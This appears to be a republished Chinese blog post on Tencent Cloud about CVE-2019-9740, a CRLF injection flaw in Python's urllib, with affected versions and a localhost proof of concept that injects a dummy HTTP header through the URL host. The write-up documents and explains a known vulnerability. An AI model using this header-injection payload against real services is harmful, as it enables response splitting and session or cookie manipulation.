前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >Python urllib CRLF 注入(CVE-2019-9740)

Python urllib CRLF 注入(CVE-2019-9740)

作者头像
R0A1NG
发布2022-03-07 11:08:38
9100
发布2022-03-07 11:08:38
举报
文章被收录于专栏:R0A1NG 技术分享R0A1NG 技术分享

漏洞原理

Python 2.x版本至2.7.16版本中的urllib2和Python 3.x版本至3.7.2版本中的urllib存在注入漏洞。该漏洞源于用户输入构造命令、数据结构或记录的操作过程中,网络系统或产品缺乏对用户输入数据的正确验证,未过滤或未正确过滤掉其中的特殊元素,导致系统或产品产生解析或解释方式错误。

CRLF即为 "回车+换行" (\r\n)的简称,十六进制码为0x0d和0x0a。HTTP中HTTP header和http Body是用两个\n\r来区别的,浏览器根据这两个\r\n来取出HTTP内容并显示出来。因此,当我们能控制HTTP 消息头中的字符,注入一些恶意的换行就能够诸如一些例如会话Cookie或者HTML body的代码。

影响版本

Python 2.x版本至2.7.16版本中的urllib2 Python 3.x版本至3.7.2版本中的urllib

漏洞复现

正常请求

代码语言:javascript
复制
import urllib.request

host='127.0.0.1'
url=f'http://{host}/'
resp=urllib.request.urlopen(url)
print(resp.read())

抓包

代码语言:javascript
复制
GET / HTTP/1.1
Host: 127.0.0.1
User-Agent: python-requests/2.22.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close

漏洞请求

代码语言:javascript
复制
import urllib.request

host='127.0.0.1?\r\nTT: wwwww\r\n'
url=f'http://{host}/'
resp=urllib.request.urlopen(url)
print(resp.read())

抓包

代码语言:javascript
复制
GET /?
TT: wwwww
 HTTP/1.1
Host: 127.0.0.1
User-Agent: python-requests/2.22.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
原始发表:2022 年 03 月,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 漏洞原理
  • 影响版本
  • 漏洞复现
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档